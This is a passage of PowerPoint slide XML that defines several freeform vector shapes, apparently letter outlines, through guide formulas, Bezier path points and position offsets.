                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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3" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24020BCF-AC23-4C0F-B371-7A39C5332694}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4087814" y="2803525"/>
              <a:ext cx="98425" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 81 w 233"/>
                <a:gd name="T1" fmla="*/ 18 h 304"/>
                <a:gd name="T2" fmla="*/ 54 w 233"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 20 w 233"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 233"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 233"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 32 w 233"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 32 w 233"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 233"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 233"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 233"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 73 w 233"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 93 w 233"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 73 w 233"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 60 w 233"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 60 w 233"/>
                <a:gd name="T29" fmla="*/ 37 h 304"/>
                <a:gd name="T30" fmla="*/ 61 w 233"/>
                <a:gd name="T31" fmla="*/ 37 h 304"/>
                <a:gd name="T32" fmla="*/ 152 w 233"/>
                <a:gd name="T33" fmla="*/ 286 h 304"/>
                <a:gd name="T34" fmla="*/ 180 w 233"/>
                <a:gd name="T35" fmla="*/ 304 h 304"/>
                <a:gd name="T36" fmla="*/ 201 w 233"/>
                <a:gd name="T37" fmla="*/ 284 h 304"/>
                <a:gd name="T38" fmla="*/ 201 w 233"/>
                <a:gd name="T39" fmla="*/ 30 h 304"/>
                <a:gd name="T40" fmla="*/ 213 w 233"/>
                <a:gd name="T41" fmla="*/ 30 h 304"/>
                <a:gd name="T42" fmla="*/ 233 w 233"/>
                <a:gd name="T43" fmla="*/ 15 h 304"/>
                <a:gd name="T44" fmla="*/ 213 w 233"/>
                <a:gd name="T45" fmla="*/ 0 h 304"/>
                <a:gd name="T46" fmla="*/ 160 w 233"/>
                <a:gd name="T47" fmla="*/ 0 h 304"/>
                <a:gd name="T48" fmla="*/ 140 w 233"/>
                <a:gd name="T49" fmla="*/ 15 h 304"/>
                <a:gd name="T50" fmla="*/ 160 w 233"/>
                <a:gd name="T51" fmla="*/ 30 h 304"/>
                <a:gd name="T52" fmla="*/ 173 w 233"/>
                <a:gd name="T53" fmla="*/ 30 h 304"/>
                <a:gd name="T54" fmla="*/ 173 w 233"/>
                <a:gd name="T55" fmla="*/ 267 h 304"/>
                <a:gd name="T56" fmla="*/ 172 w 233"/>
                <a:gd name="T57" fmla="*/ 267 h 304"/>
                <a:gd name="T58" fmla="*/ 81 w 233"/>
                <a:gd name="T59" fmla="*/ 18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3" h="304">
                  <a:moveTo>
                    <a:pt x="81" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1"/>
                    <a:pt x="67" y="0"/>
                    <a:pt x="54" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="304"/>
                    <a:pt x="93" y="304"/>
                    <a:pt x="93" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="274"/>
                    <a:pt x="81" y="274"/>
                    <a:pt x="73" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="286"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="304"/>
                    <a:pt x="167" y="304"/>
                    <a:pt x="180" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="304"/>
                    <a:pt x="201" y="303"/>
                    <a:pt x="201" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="30"/>
                    <a:pt x="233" y="30"/>
                    <a:pt x="233" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="0"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="213" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="140" y="0"/>
                    <a:pt x="140" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="30"/>
                    <a:pt x="153" y="30"/>
                    <a:pt x="160" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="1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4" name="Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E7292DA-C0C0-4357-8532-19D230FC70BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4203701" y="2841625"/>
              <a:ext cx="98425" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="89" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="149" y="11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5" name="Freeform 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF7EFDD-BEA5-4247-B1B2-133D5B8FB4B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4302126" y="2841625"/>
              <a:ext cx="109538" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="10" y="34"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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6" name="Freeform 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7162293-F2F4-4371-934A-C86BDF3F4FA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId28"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425951" y="2841625"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
